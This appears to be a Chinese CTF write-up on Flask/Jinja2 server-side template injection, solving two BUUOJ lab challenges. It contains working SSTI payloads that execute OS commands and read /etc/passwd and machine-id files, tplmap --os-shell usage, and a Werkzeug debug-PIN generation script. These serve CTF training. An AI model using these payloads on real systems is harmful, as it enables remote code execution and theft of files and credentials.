ssti 模板注入

工具

1.arjun

github地址

可以扫描网页可以传递的参数

2.tplmap

类似sqlmap，可以扫描模板注入漏洞

3.获取eval函数并执行任意python代码的POC：

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("id").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

---

[RootersCTF2019]I_<3_Flask

进入，使用arjun扫描

发现name参数

存在回显

方法一

使用tqlmap

python tplmap.py -u http://954f248d-c586-4b47-b18b-819c586be39d.node4.buuoj.cn:81/?name=233

存在注入漏洞，并且可以链接shell

连接

>python tplmap.py -u http://954f248d-c586-4b47-b18b-819c586be39d.node4.buuoj.cn:81/?name=233 --os-shell

 成功连接，拿到flag

方法二

自己手动尝试

 存在flask模板注入

构造paylaod

?name={{''.__class__.__base__.__subclasses__()}}

搜索敏感词

发现存在popen方法

 通过脚本确定是数组第222个元素，继续构造paylaod

?name={{''.__class__.__base__.__subclasses__()[222].__init__.__globals__['os'].popen('类似').read()}}

拿到shell

直接cat flag.txt

 

[GYCTF2020]FlaskApp

题目是一个base64 加密解密的程序。
多次尝试之后发现页面开启了flask的debug模式 ，解码的地方输入1进入debug。

在debug有源码泄露

可以看到存在ssti模板注入
文件路径也暴露了

发现不能命令执行，尝试读取文件

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/etc/passwd', 'r').read() }}{% endif %}{% endfor %}

在解密页面用过base64加密传入

可以看到用户应该为flaskweb 或者root，由于flag文件路径未知，便尝试获得此debug的pin码从而得到一个python的交互式shell
Mac地址：

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/sys/class/net/eth0/address', 'r').read() }}{% endif %}{% endfor %}

机器id：

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/etc/machine-id', 'r').read() }}{% endif %}{% endfor %}

对于非docker机每一个机器都会有自已唯一的id，linux的id一般存放在/etc/machine-id或/proc/sys/kernel/random/boot_i，有的系统没有这两个文件，windows的id获取跟linux也不同。
对于docker机则读取/proc/self/cgroup：
运行脚本获取pin码（kingkk师傅的exp）：

import hashlib
from itertools import chain
probably_public_bits = [
    'flaskweb',# username用户名,可以通过查看/etc/passwd查看
    'flask.app',# modname程序名
    'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))对象名
    '/usr/local/lib/python3.7/site-packages/flask/app.py' # getattr(mod, '__file__', None),绝对路径
]

private_bits = [
    '213487284563069',# str(uuid.getnode()),  /sys/class/net/ens33/address或者/sys/class/net/eth0/address（最后一级目录不太确定）   mac地址的十进制表达式
    '1408f836b0ca514d796cbf8960e45fa1'# get_machine_id(), /etc/machine-id   首先尝试读取/etc/machine-id或者 /proc/sys/kernel/random/boot_i中的值，若有就直接返回假如是在win平台下读取不到上面两个文件，就去获取注册表中SOFTWARE\\Microsoft\\Cryptography的值，并返回
]

h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

运行

进入shell

拿到flag（ps：目录里/n是一个整体）